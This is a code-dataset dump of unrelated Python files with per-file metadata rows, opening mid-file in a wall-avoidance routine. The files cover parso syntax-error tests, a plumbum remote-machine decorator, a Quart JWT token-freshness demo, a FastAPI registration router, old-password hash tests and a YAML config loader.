            # No wall nearby: keep going straight.
            choice = current_direction
        elif proximity['type'] == 'corner':
            # Cornered: continuing straight would hit a wall.
            options.remove(current_direction)
            vertical, horizontal = proximity['identifier'].split()
            away_vertical = 'down' if vertical == 'top' else 'up'
            away_horizontal = 'right' if horizontal == 'left' else 'left'
            # Prefer escaping along the vertical axis, else turn sideways.
            choice = away_vertical if away_vertical in options else away_horizontal
        elif proximity['type'] == 'head-on':
            # Driving straight at a wall: turn to a random remaining side.
            options.remove(current_direction)
            choice = random.choice(options)
        else:
            # 'parallel': hugging a wall is safe, keep going straight.
            choice = current_direction
        return choice
| 29.217647
| 122
| 0.655124
| 604
| 4,967
| 5.32947
| 0.155629
| 0.055918
| 0.06151
| 0.072693
| 0.462255
| 0.370923
| 0.331469
| 0.314073
| 0.282075
| 0.177074
| 0
| 0.008033
| 0.172941
| 4,967
| 169
| 123
| 29.390533
| 0.77556
| 0.034629
| 0
| 0.227642
| 0
| 0
| 0.155635
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.146341
| false
| 0.097561
| 0.00813
| 0
| 0.357724
| 0.01626
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07fb390e2fe8908e8e3a429d629ca30f1d77df66
| 11,225
|
py
|
Python
|
test/test_python_errors.py
|
yangyangxcf/parso
|
e496b07b6342f6182225a60aad6031d7ad08f24d
|
[
"PSF-2.0"
] | null | null | null |
test/test_python_errors.py
|
yangyangxcf/parso
|
e496b07b6342f6182225a60aad6031d7ad08f24d
|
[
"PSF-2.0"
] | null | null | null |
test/test_python_errors.py
|
yangyangxcf/parso
|
e496b07b6342f6182225a60aad6031d7ad08f24d
|
[
"PSF-2.0"
] | null | null | null |
"""
Testing if parso finds syntax errors and indentation errors.
"""
import sys
import warnings
import pytest
import parso
from parso._compatibility import is_pypy
from .failing_examples import FAILING_EXAMPLES, indent, build_nested
if is_pypy:
# The errors in PyPy might be different. Just skip the module for now.
pytestmark = pytest.mark.skip()
def _get_error_list(code, version=None):
    """Parse *code* with parso and return its errors as a list."""
    grammar = parso.load_grammar(version=version)
    return list(grammar.iter_errors(grammar.parse(code)))
def assert_comparison(code, error_code, positions):
    """Assert that *code* produces exactly *positions*, all with *error_code*."""
    expected = [(pos, error_code) for pos in positions]
    found = [(err.start_pos, err.code) for err in _get_error_list(code)]
    assert expected == found
@pytest.mark.parametrize('code', FAILING_EXAMPLES)
def test_python_exception_matches(code):
    # Compare parso's reported error message against what CPython raises.
    wanted, line_nr = _get_actual_exception(code)
    errors = _get_error_list(code)
    actual = None
    if errors:
        error, = errors
        actual = error.message
    assert actual in wanted
    # Somehow in Python3.3 the SyntaxError().lineno is sometimes None
    assert line_nr is None or line_nr == error.start_pos[0]
def test_non_async_in_async():
    """
    This example doesn't work with FAILING_EXAMPLES, because the line numbers
    are not always the same / incorrect in Python 3.8.
    """
    if sys.version_info[:2] < (3, 5):
        pytest.skip()
    # Raises multiple errors in previous versions.
    code = 'async def foo():\n def nofoo():[x async for x in []]'
    wanted, line_nr = _get_actual_exception(code)
    errors = _get_error_list(code)
    if errors:
        error, = errors
        actual = error.message
        assert actual in wanted
        if sys.version_info[:2] < (3, 8):
            assert line_nr == error.start_pos[0]
        else:
            assert line_nr == 0  # For whatever reason this is zero in Python 3.8+
@pytest.mark.parametrize(
    ('code', 'positions'), [
        ('1 +', [(1, 3)]),
        ('1 +\n', [(1, 3)]),
        ('1 +\n2 +', [(1, 3), (2, 3)]),
        ('x + 2', []),
        ('[\n', [(2, 0)]),
        ('[\ndef x(): pass', [(2, 0)]),
        ('[\nif 1: pass', [(2, 0)]),
        ('1+?', [(1, 2)]),
        ('?', [(1, 0)]),
        ('??', [(1, 0)]),
        ('? ?', [(1, 0)]),
        ('?\n?', [(1, 0), (2, 0)]),
        ('? * ?', [(1, 0)]),
        ('1 + * * 2', [(1, 4)]),
        ('?\n1\n?', [(1, 0), (3, 0)]),
    ]
)
def test_syntax_errors(code, positions):
    # 901 is parso's error code for generic syntax errors.
    assert_comparison(code, 901, positions)
@pytest.mark.parametrize(
    ('code', 'positions'), [
        ('  1', [(1, 0)]),
        ('def x():\n    1\n 2', [(3, 0)]),
        ('def x():\n    1\n  2', [(3, 0)]),
        ('def x():\n1', [(2, 0)]),
    ]
)
def test_indentation_errors(code, positions):
    # 903 is parso's error code for indentation errors.
    assert_comparison(code, 903, positions)
def _get_actual_exception(code):
    # Compile *code* with CPython itself and capture the raised exception,
    # so the message can be compared against what parso reports.  Returns
    # (list_of_acceptable_messages, line_number_or_None).
    with warnings.catch_warnings():
        # We don't care about warnings where locals/globals misbehave here.
        # It's as simple as either an error or not.
        warnings.filterwarnings('ignore', category=SyntaxWarning)
        try:
            compile(code, '<unknown>', 'exec')
        except (SyntaxError, IndentationError) as e:
            wanted = e.__class__.__name__ + ': ' + e.msg
            line_nr = e.lineno
        except ValueError as e:
            # The ValueError comes from byte literals in Python 2 like '\x'
            # that are oddly enough not SyntaxErrors.
            wanted = 'SyntaxError: (value error) ' + str(e)
            line_nr = None
        else:
            assert False, "The piece of code should raise an exception."
    # SyntaxError
    # Python 2.6 has a bit different error messages here, so skip it.
    if sys.version_info[:2] == (2, 6) and wanted == 'SyntaxError: unexpected EOF while parsing':
        wanted = 'SyntaxError: invalid syntax'
    # Normalize version-specific CPython messages so each test accepts the
    # wording of every supported interpreter.
    if wanted == 'SyntaxError: non-keyword arg after keyword arg':
        # The python 3.5+ way, a bit nicer.
        wanted = 'SyntaxError: positional argument follows keyword argument'
    elif wanted == 'SyntaxError: assignment to keyword':
        return [wanted, "SyntaxError: can't assign to keyword",
                'SyntaxError: cannot assign to __debug__'], line_nr
    elif wanted == 'SyntaxError: assignment to None':
        # Python 2.6 does has a slightly different error.
        wanted = 'SyntaxError: cannot assign to None'
    elif wanted == 'SyntaxError: can not assign to __debug__':
        # Python 2.6 does has a slightly different error.
        wanted = 'SyntaxError: cannot assign to __debug__'
    elif wanted == 'SyntaxError: can use starred expression only as assignment target':
        # Python 3.4/3.4 have a bit of a different warning than 3.5/3.6 in
        # certain places. But in others this error makes sense.
        return [wanted, "SyntaxError: can't use starred expression here"], line_nr
    elif wanted == 'SyntaxError: f-string: unterminated string':
        wanted = 'SyntaxError: EOL while scanning string literal'
    elif wanted == 'SyntaxError: f-string expression part cannot include a backslash':
        return [
            wanted,
            "SyntaxError: EOL while scanning string literal",
            "SyntaxError: unexpected character after line continuation character",
        ], line_nr
    elif wanted == "SyntaxError: f-string: expecting '}'":
        wanted = 'SyntaxError: EOL while scanning string literal'
    elif wanted == 'SyntaxError: f-string: empty expression not allowed':
        wanted = 'SyntaxError: invalid syntax'
    elif wanted == "SyntaxError: f-string expression part cannot include '#'":
        wanted = 'SyntaxError: invalid syntax'
    elif wanted == "SyntaxError: f-string: single '}' is not allowed":
        wanted = 'SyntaxError: invalid syntax'
    return [wanted], line_nr
def test_default_except_error_postition():
    # For this error the position seemed to be one line off, but that doesn't
    # really matter.
    code = 'try: pass\nexcept: pass\nexcept X: pass'
    wanted, line_nr = _get_actual_exception(code)
    error, = _get_error_list(code)
    assert error.message in wanted
    assert line_nr != error.start_pos[0]
    # I think this is the better position.
    assert error.start_pos[0] == 2
def test_statically_nested_blocks():
    """Parso must flag more than 20 statically nested blocks (CPython limit)."""
    def wrap(code, depth):
        # Nest *code* inside `if 1:` blocks, *depth* levels deep.
        for _ in range(depth):
            code = 'if 1:\n' + indent(code)
        return code
    def error_for(depth, add_func=False):
        snippet = wrap('foo', depth)
        if add_func:
            snippet = 'def bar():\n' + indent(snippet)
        issues = _get_error_list(snippet)
        if issues:
            assert issues[0].message == 'SyntaxError: too many statically nested blocks'
            return issues[0]
        return None
    assert error_for(19) is None
    assert error_for(19, add_func=True) is None
    assert error_for(20)
    assert error_for(20, add_func=True)
def test_future_import_first():
    # __future__ imports must come before any other statement; only a
    # docstring (a leading string literal) may precede them.
    def is_issue(code, *args):
        code = code % args
        return bool(_get_error_list(code))
    i1 = 'from __future__ import division'
    i2 = 'from __future__ import absolute_import'
    assert not is_issue(i1)
    assert not is_issue(i1 + ';' + i2)
    assert not is_issue(i1 + '\n' + i2)
    assert not is_issue('"";' + i1)
    assert not is_issue('"";' + i1)
    assert not is_issue('""\n' + i1)
    assert not is_issue('""\n%s\n%s', i1, i2)
    assert not is_issue('""\n%s;%s', i1, i2)
    assert not is_issue('"";%s;%s ', i1, i2)
    assert not is_issue('"";%s\n%s ', i1, i2)
    assert is_issue('1;' + i1)
    assert is_issue('1\n' + i1)
    assert is_issue('"";1\n' + i1)
    assert is_issue('""\n%s\nfrom x import a\n%s', i1, i2)
    assert is_issue('%s\n""\n%s', i1, i2)
def test_named_argument_issues(works_not_in_py):
    # A bare `*` in a signature needs at least one following named argument.
    message = works_not_in_py.get_error_message('def foo(*, **dict): pass')
    message = works_not_in_py.get_error_message('def foo(*): pass')
    if works_not_in_py.version.startswith('2'):
        assert message == 'SyntaxError: invalid syntax'
    else:
        assert message == 'SyntaxError: named arguments must follow bare *'
    works_not_in_py.assert_no_error_in_passing('def foo(*, name): pass')
    works_not_in_py.assert_no_error_in_passing('def foo(bar, *, name=1): pass')
    works_not_in_py.assert_no_error_in_passing('def foo(bar, *, name=1, **dct): pass')
def test_escape_decode_literals(each_version):
    """
    We are using internal functions to assure that unicode/bytes escaping is
    without syntax errors. Here we make a bit of quality assurance that this
    works through versions, because the internal function might change over
    time.
    """
    def get_msg(end, to=1):
        base = "SyntaxError: (unicode error) 'unicodeescape' " \
               "codec can't decode bytes in position 0-%s: " % to
        return base + end
    def get_msgs(escape):
        # CPython's wording differs across versions, accept both variants.
        return (get_msg('end of string in escape sequence'),
                get_msg(r"truncated %s escape" % escape))
    error, = _get_error_list(r'u"\x"', version=each_version)
    assert error.message in get_msgs(r'\xXX')
    error, = _get_error_list(r'u"\u"', version=each_version)
    assert error.message in get_msgs(r'\uXXXX')
    error, = _get_error_list(r'u"\U"', version=each_version)
    assert error.message in get_msgs(r'\UXXXXXXXX')
    error, = _get_error_list(r'u"\N{}"', version=each_version)
    assert error.message == get_msg(r'malformed \N character escape', to=2)
    error, = _get_error_list(r'u"\N{foo}"', version=each_version)
    assert error.message == get_msg(r'unknown Unicode character name', to=6)
    # Finally bytes.
    error, = _get_error_list(r'b"\x"', version=each_version)
    wanted = r'SyntaxError: (value error) invalid \x escape'
    if sys.version_info >= (3, 0):
        # The positioning information is only available in Python 3.
        wanted += ' at position 0'
    assert error.message == wanted
def test_too_many_levels_of_indentation():
    # CPython allows at most 100 indentation levels; parso should match.
    assert not _get_error_list(build_nested('pass', 99))
    assert _get_error_list(build_nested('pass', 100))
    base = 'def x():\n if x:\n'
    assert not _get_error_list(build_nested('pass', 49, base=base))
    assert _get_error_list(build_nested('pass', 50, base=base))
@pytest.mark.parametrize(
    'code', [
        "f'{*args,}'",
        r'f"\""',
        r'f"\\\""',
        r'fr"\""',
        r'fr"\\\""',
        r"print(f'Some {x:.2f} and some {y}')",
    ]
)
def test_valid_fstrings(code):
    # None of these f-strings should produce an error on 3.6 grammar.
    assert not _get_error_list(code, version='3.6')
@pytest.mark.parametrize(
    ('code', 'message'), [
        ("f'{1+}'", ('invalid syntax')),
        (r'f"\"', ('invalid syntax')),
        (r'fr"\"', ('invalid syntax')),
    ]
)
def test_invalid_fstrings(code, message):
    """
    Some fstring errors are handled differently in 3.6 and other versions.
    Therefore check specifically for these errors here.
    """
    error, = _get_error_list(code, version='3.6')
    assert message in error.message
@pytest.mark.parametrize(
    'code', [
        "from foo import (\nbar,\n rab,\n)",
        "from foo import (bar, rab, )",
    ]
)
def test_trailing_comma(code):
    # Trailing commas in parenthesized import lists are valid syntax.
    errors = _get_error_list(code)
    assert not errors
| 34.860248
| 96
| 0.625568
| 1,546
| 11,225
| 4.372574
| 0.207633
| 0.031953
| 0.035503
| 0.023669
| 0.383728
| 0.331953
| 0.29142
| 0.219379
| 0.203698
| 0.156805
| 0
| 0.020049
| 0.240178
| 11,225
| 321
| 97
| 34.968847
| 0.772541
| 0.132829
| 0
| 0.173913
| 0
| 0
| 0.25599
| 0
| 0
| 0
| 0
| 0
| 0.221739
| 1
| 0.091304
| false
| 0.052174
| 0.052174
| 0.004348
| 0.195652
| 0.004348
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07fd108f6337b8e7a88da0155cf318b6098e4ae4
| 2,585
|
py
|
Python
|
src/grader/machine.py
|
MrKaStep/csc230-grader
|
559846f4d921c5c4be6b6e9ba8629fb24b448e41
|
[
"MIT"
] | null | null | null |
src/grader/machine.py
|
MrKaStep/csc230-grader
|
559846f4d921c5c4be6b6e9ba8629fb24b448e41
|
[
"MIT"
] | null | null | null |
src/grader/machine.py
|
MrKaStep/csc230-grader
|
559846f4d921c5c4be6b6e9ba8629fb24b448e41
|
[
"MIT"
] | null | null | null |
import getpass
from plumbum import local
from plumbum.machines.paramiko_machine import ParamikoMachine
from plumbum.path.utils import copy
def _once(f):
res = None
def wrapped(*args, **kwargs):
nonlocal res
if res is None:
res = f(*args, **kwargs)
return res
return wrapped
@_once
def get_remote_machine_with_password(host, user):
    """Prompt for a password and open (once) a Paramiko machine for host."""
    secret = getpass.getpass(prompt=f"Password for {user}@{host}: ", stream=None)
    return ParamikoMachine(host, user=user, password=secret)
@_once
def get_remote_machine(host, user, keyfile):
    """Open (once) a key-based Paramiko machine for *host*."""
    return ParamikoMachine(host, user=user, keyfile=keyfile)
def get_local_machine():
    """Return plumbum's ``local`` machine object."""
    return local
def with_machine_rule(cls):
    """Class decorator: attach a plumbum machine (local or remote) to *cls*.

    Wraps ``__init__`` to build ``self.machine`` from ``config["machine"]``
    and wraps ``apply`` to copy the project into a temporary directory on
    that machine before delegating to the original ``apply``.
    """
    old_init = cls.__init__
    def new_init(self, config):
        # Default to the local machine when no machine section is configured.
        if "machine" not in config:
            machine_type = "local"
        else:
            machine_type = config["machine"]["type"]
        if machine_type == "local":
            self.machine = get_local_machine()
            self.files_to_copy = None
        elif machine_type == "remote":
            # Key-based auth when a keyfile is given, else password prompt.
            if "keyfile" in config["machine"]:
                self.machine = get_remote_machine(config["machine"]["host"], config["machine"]["user"], config["machine"]["keyfile"])
            else:
                self.machine = get_remote_machine_with_password(config["machine"]["host"], config["machine"]["user"])
            self.files_to_copy = config["machine"].get("files_to_copy")
        else:
            raise ValueError(f"Invalid machine type: {config['machine']['type']}")
        self.machine_type = machine_type
        old_init(self, config)
    cls.__init__ = new_init
    old_apply = cls.apply
    def new_apply(self, project):
        with self.machine.tempdir() as tempdir:
            project_path = tempdir / "project"
            project_path.mkdir()
            # Only copy files that actually exist in the project root.
            existing_files = set([f.name for f in project.root.list()])
            if self.files_to_copy:
                for fname in self.files_to_copy:
                    if fname in existing_files:
                        copy(project.root / fname, project_path / fname)
            else:
                for f in project.files():
                    if f.name in existing_files:
                        copy(f.path, project_path / f.name)
            with self.machine.cwd(project_path):
                # A persistent shell session, cd'ed into the copied project.
                self.session = self.machine.session()
                self.session.run(f"cd {project_path}")
                return old_apply(self, project)
    cls.apply = new_apply
    return cls
| 32.3125
| 133
| 0.600387
| 311
| 2,585
| 4.787781
| 0.215434
| 0.087307
| 0.036938
| 0.040296
| 0.20685
| 0.045668
| 0
| 0
| 0
| 0
| 0
| 0
| 0.292843
| 2,585
| 79
| 134
| 32.721519
| 0.814551
| 0
| 0
| 0.125
| 0
| 0
| 0.087848
| 0.010449
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0.078125
| 0.0625
| 0.015625
| 0.296875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07ff31219d3e42ddfa090b695c0d4b6ede8d31e9
| 2,826
|
py
|
Python
|
examples/token_freshness.py
|
greenape/flask-jwt-extended
|
11ac3bf0937ee199aea7d6dc47c748bef9bf1d2f
|
[
"MIT"
] | 2
|
2021-03-20T01:55:08.000Z
|
2021-11-14T12:20:23.000Z
|
examples/token_freshness.py
|
greenape/flask-jwt-extended
|
11ac3bf0937ee199aea7d6dc47c748bef9bf1d2f
|
[
"MIT"
] | 1
|
2020-08-06T23:02:45.000Z
|
2020-09-26T01:36:21.000Z
|
examples/token_freshness.py
|
greenape/flask-jwt-extended
|
11ac3bf0937ee199aea7d6dc47c748bef9bf1d2f
|
[
"MIT"
] | 1
|
2020-10-28T20:09:00.000Z
|
2020-10-28T20:09:00.000Z
|
from quart import Quart, jsonify, request
from quart_jwt_extended import (
JWTManager,
jwt_required,
create_access_token,
jwt_refresh_token_required,
create_refresh_token,
get_jwt_identity,
fresh_jwt_required,
)
app = Quart(__name__)
# Secret used to sign the JWTs -- must be replaced before deploying.
app.config["JWT_SECRET_KEY"] = "super-secret"  # Change this!
jwt = JWTManager(app)
# Standard login endpoint. Will return a fresh access token and
# a refresh token
@app.route("/login", methods=["POST"])
async def login():
    """Verify the (hard-coded demo) credentials and return a *fresh*
    access token plus a refresh token.
    """
    # Fetch the JSON body once instead of awaiting it per field.
    payload = await request.get_json()
    username = payload.get("username", None)
    password = payload.get("password", None)
    if username != "test" or password != "test":
        return {"msg": "Bad username or password"}, 401

    # create_access_token supports an optional 'fresh' argument,
    # which marks the token as fresh or non-fresh accordingly.
    # As we just verified their username and password, we are
    # going to mark the token as fresh here.
    ret = {
        "access_token": create_access_token(identity=username, fresh=True),
        "refresh_token": create_refresh_token(identity=username),
    }
    return ret, 200
# Refresh token endpoint. This will generate a new access token from
# the refresh token, but will mark that access token as non-fresh,
# as we do not actually verify a password in this endpoint.
@app.route("/refresh", methods=["POST"])
@jwt_refresh_token_required
async def refresh():
    """Exchange a valid refresh token for a *non-fresh* access token."""
    identity = get_jwt_identity()
    token = create_access_token(identity=identity, fresh=False)
    return {"access_token": token}, 200
# Fresh login endpoint. This is designed to be used if we need to
# make a fresh token for a user (by verifying they have the
# correct username and password). Unlike the standard login endpoint,
# this will only return a new access token, so that we don't keep
# generating new refresh tokens, which entirely defeats their point.
@app.route("/fresh-login", methods=["POST"])
async def fresh_login():
    """Re-authenticate a user to obtain a *fresh* access token.

    Unlike the standard login endpoint, no refresh token is issued.
    """
    # Fetch the JSON body once instead of awaiting it per field.
    payload = await request.get_json()
    username = payload.get("username", None)
    password = payload.get("password", None)
    if username != "test" or password != "test":
        return {"msg": "Bad username or password"}, 401
    new_token = create_access_token(identity=username, fresh=True)
    ret = {"access_token": new_token}
    return ret, 200
# Any valid JWT can access this endpoint
@app.route("/protected", methods=["GET"])
@jwt_required
async def protected():
username = get_jwt_identity()
return dict(logged_in_as=username), 200
# Only fresh JWTs can access this endpoint
@app.route("/protected-fresh", methods=["GET"])
@fresh_jwt_required
async def protected_fresh():
    """Endpoint accessible only with a *fresh* JWT."""
    return dict(fresh_logged_in_as=get_jwt_identity()), 200
if __name__ == "__main__":
    # Start the Quart development server when run as a script.
    app.run()
| 33.247059
| 75
| 0.714084
| 398
| 2,826
| 4.89196
| 0.28392
| 0.067797
| 0.043657
| 0.039034
| 0.402671
| 0.327684
| 0.276323
| 0.237288
| 0.154083
| 0.154083
| 0
| 0.009044
| 0.178344
| 2,826
| 84
| 76
| 33.642857
| 0.829457
| 0.31564
| 0
| 0.288462
| 0
| 0
| 0.13309
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.115385
| 0.038462
| 0
| 0.173077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
5805a2c8d616906daf19682b40baa91f10a88715
| 1,845
|
py
|
Python
|
app/routes/register.py
|
AuFeld/COAG
|
3874a9c1c6ceb908a6bbabfb49e2c701d8e54f20
|
[
"MIT"
] | 1
|
2021-06-03T10:29:12.000Z
|
2021-06-03T10:29:12.000Z
|
app/routes/register.py
|
AuFeld/COAG
|
3874a9c1c6ceb908a6bbabfb49e2c701d8e54f20
|
[
"MIT"
] | 45
|
2021-06-05T14:47:09.000Z
|
2022-03-30T06:16:44.000Z
|
app/routes/register.py
|
AuFeld/COAG
|
3874a9c1c6ceb908a6bbabfb49e2c701d8e54f20
|
[
"MIT"
] | null | null | null |
from typing import Callable, Optional, Type, cast
from fastapi import APIRouter, HTTPException, Request, status
from app.models import users
from app.common.user import ErrorCode, run_handler
from app.users.user import (
CreateUserProtocol,
InvalidPasswordException,
UserAlreadyExists,
ValidatePasswordProtocol,
)
def get_register_router(
    create_user: CreateUserProtocol,
    user_model: Type[users.BaseUser],
    user_create_model: Type[users.BaseUserCreate],
    after_register: Optional[Callable[[users.UD, Request], None]] = None,
    validate_password: Optional[ValidatePasswordProtocol] = None,
) -> APIRouter:
    """Generate a router with the register route.

    create_user: callable that persists a new user.
    user_model: response model for the created user.
    user_create_model: request model for registration payloads.
    after_register: optional hook invoked after successful creation.
    validate_password: optional password policy check.
    """
    router = APIRouter()
    @router.post(
        "/register", response_model=user_model, status_code=status.HTTP_201_CREATED
    )
    async def register(request: Request, user: user_create_model):  # type: ignore
        user = cast(users.BaseUserCreate, user)  # Prevent mypy complain
        # Enforce the password policy (if configured) before persisting.
        if validate_password:
            try:
                await validate_password(user.password, user)
            except InvalidPasswordException as e:
                # 400 with a structured reason so clients can show details.
                raise HTTPException(
                    status_code=status.HTTP_400_BAD_REQUEST,
                    detail={
                        "code": ErrorCode.REGISTER_INVALID_PASSWORD,
                        "reason": e.reason,
                    },
                )
        try:
            # NOTE(review): safe=True presumably restricts privileged
            # fields during creation -- confirm in create_user.
            created_user = await create_user(user, safe=True)
        except UserAlreadyExists:
            raise HTTPException(
                status_code=status.HTTP_400_BAD_REQUEST,
                detail=ErrorCode.REGISTER_USER_ALREADY_EXISTS,
            )
        # Fire the post-registration hook, if one was provided.
        if after_register:
            await run_handler(after_register, created_user, request)
        return created_user
    return router
| 32.946429
| 83
| 0.648238
| 184
| 1,845
| 6.293478
| 0.380435
| 0.018135
| 0.041451
| 0.051813
| 0.098446
| 0.098446
| 0.098446
| 0.098446
| 0.098446
| 0.098446
| 0
| 0.006767
| 0.279133
| 1,845
| 55
| 84
| 33.545455
| 0.86391
| 0.042276
| 0
| 0.133333
| 0
| 0
| 0.010795
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022222
| false
| 0.155556
| 0.111111
| 0
| 0.177778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
ed0fc8cf4f946e650eb4b14f0a5d7690952a62a3
| 980
|
py
|
Python
|
python/old_password_test.py
|
XelaRellum/old_password
|
b461941069bc7f1187776a992f86c89317ab215e
|
[
"MIT"
] | null | null | null |
python/old_password_test.py
|
XelaRellum/old_password
|
b461941069bc7f1187776a992f86c89317ab215e
|
[
"MIT"
] | null | null | null |
python/old_password_test.py
|
XelaRellum/old_password
|
b461941069bc7f1187776a992f86c89317ab215e
|
[
"MIT"
] | null | null | null |
import unittest
import pytest
from old_password import old_password
import csv
import re
@pytest.mark.parametrize("password,expected_hash", [
    (None, None),
    ("", ""),
    ("a", "60671c896665c3fa"),
    ("abc", "7cd2b5942be28759"),
    ("ä", "0751368d49315f7f"),
])
def test_old_password(password, expected_hash):
    # Known-answer tests for old_password(), including the None/empty
    # pass-through cases and one non-ASCII input.
    assert old_password(password) == expected_hash
def test_password_with_space():
    """A space embedded in the password must not change the hash."""
    spaced = old_password("pass word")
    plain = old_password("password")
    assert spaced == plain
def test_password_with_tab():
    """A tab embedded in the password must not change the hash."""
    tabbed = old_password("pass\tword")
    plain = old_password("password")
    assert tabbed == plain
def test_password_from_testdata():
    """Check old_password() against every pair in ../testdata.csv.

    Each line has the form ``<password>;<expected_hash>``.  Split on the
    *last* ';' so a password that itself contains a semicolon still
    parses (the original ``split(";")`` would raise on such lines), and
    skip blank lines so a trailing newline in the fixture is harmless.
    """
    with open("../testdata.csv", "r") as file:
        for line in file:
            line = line.strip()
            if not line:
                continue
            password, expected_hash = line.rsplit(";", 1)
            hash = old_password(password)
            assert hash == expected_hash, "password: %s" % password
| 22.272727
| 67
| 0.643878
| 112
| 980
| 5.419643
| 0.383929
| 0.163097
| 0.156507
| 0.088962
| 0.349259
| 0.247117
| 0.135091
| 0.135091
| 0
| 0
| 0
| 0.04712
| 0.220408
| 980
| 43
| 68
| 22.790698
| 0.747382
| 0.060204
| 0
| 0
| 0
| 0
| 0.15618
| 0.024719
| 0
| 0
| 0
| 0
| 0.16
| 1
| 0.16
| false
| 0.48
| 0.2
| 0
| 0.36
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
ed4409f82d978378f6be973493d164c3f3a747dd
| 2,133
|
py
|
Python
|
stellar/config.py
|
gomyar/stellar
|
b2dfbe136f1540f0ca6ac5779ebaeae996a3b747
|
[
"MIT"
] | null | null | null |
stellar/config.py
|
gomyar/stellar
|
b2dfbe136f1540f0ca6ac5779ebaeae996a3b747
|
[
"MIT"
] | null | null | null |
stellar/config.py
|
gomyar/stellar
|
b2dfbe136f1540f0ca6ac5779ebaeae996a3b747
|
[
"MIT"
] | null | null | null |
import os
import logging
import yaml
from schema import Use, Schema, SchemaError, Optional
class InvalidConfig(Exception):
    """Raised when a stellar.yaml exists but fails schema validation."""
    pass


class MissingConfig(Exception):
    """Raised when no stellar.yaml could be located."""
    pass


# Values merged into the loaded config for keys the user did not set.
default_config = {
    'logging': 30,
    'migrate_from_0_3_2': True
}

# Shape of a valid stellar.yaml; Use(str) coerces values to str.
schema = Schema({
    'stellar_url': Use(str),
    'url': Use(str),
    'project_name': Use(str),
    'tracked_databases': [Use(str)],
    Optional('logging'): int,
    Optional('migrate_from_0_3_2'): bool
})
def get_config_path():
    """Walk up from the current directory looking for 'stellar.yaml'.

    Returns:
        The path of the first stellar.yaml found, or None when the
        filesystem root is reached without finding one.
    """
    current_directory = os.getcwd()
    while True:
        candidate = os.path.join(current_directory, 'stellar.yaml')
        # Probe with isfile() instead of open(): the original opened the
        # file only to discard the handle, and skipped probing '/' itself.
        if os.path.isfile(candidate):
            return candidate
        if current_directory == '/':
            return None
        current_directory = os.path.abspath(
            os.path.join(current_directory, '..')
        )
def load_config():
    """Load and validate the stellar configuration.

    Resolution order:
      1. $STELLAR_CONFIG, when set and pointing at an existing file.
      2. The nearest 'stellar.yaml' walking up from the current directory.

    Keys missing from the file are filled from `default_config`.

    Raises:
        MissingConfig: no configuration file could be found.
        InvalidConfig: the file was found but failed schema validation.
    """
    config = {}
    stellar_config_env = os.getenv('STELLAR_CONFIG')
    if stellar_config_env:
        if os.path.exists(stellar_config_env):
            # Context manager closes the handle promptly; the original
            # leaked the file object returned by open().
            with open(stellar_config_env) as fp:
                config = yaml.safe_load(fp)
    else:
        current_directory = os.getcwd()
        while True:
            try:
                with open(
                    os.path.join(current_directory, 'stellar.yaml'),
                    'rb'
                ) as fp:
                    config = yaml.safe_load(fp)
                break
            except IOError:
                pass
            if current_directory == '/':
                break
            current_directory = os.path.abspath(
                os.path.join(current_directory, '..')
            )
    if not config:
        raise MissingConfig()
    for k, v in default_config.items():
        if k not in config:
            config[k] = v
    try:
        return schema.validate(config)
    except SchemaError as e:
        raise InvalidConfig(e)
def save_config(config):
    """Serialize *config* back to the located stellar.yaml."""
    logger = logging.getLogger(__name__)
    logger.debug('save_config()')
    path = get_config_path()
    with open(path, "w") as fp:
        yaml.dump(config, fp)
| 23.43956
| 70
| 0.554149
| 234
| 2,133
| 4.854701
| 0.307692
| 0.15493
| 0.044014
| 0.074824
| 0.310739
| 0.286092
| 0.286092
| 0.253521
| 0.253521
| 0.253521
| 0
| 0.005678
| 0.339428
| 2,133
| 90
| 71
| 23.7
| 0.800568
| 0
| 0
| 0.402778
| 0
| 0
| 0.078293
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0.055556
| 0.055556
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
ed5bcaf7cb360ac7f0af74528df0eb589224f1a5
| 5,434
|
py
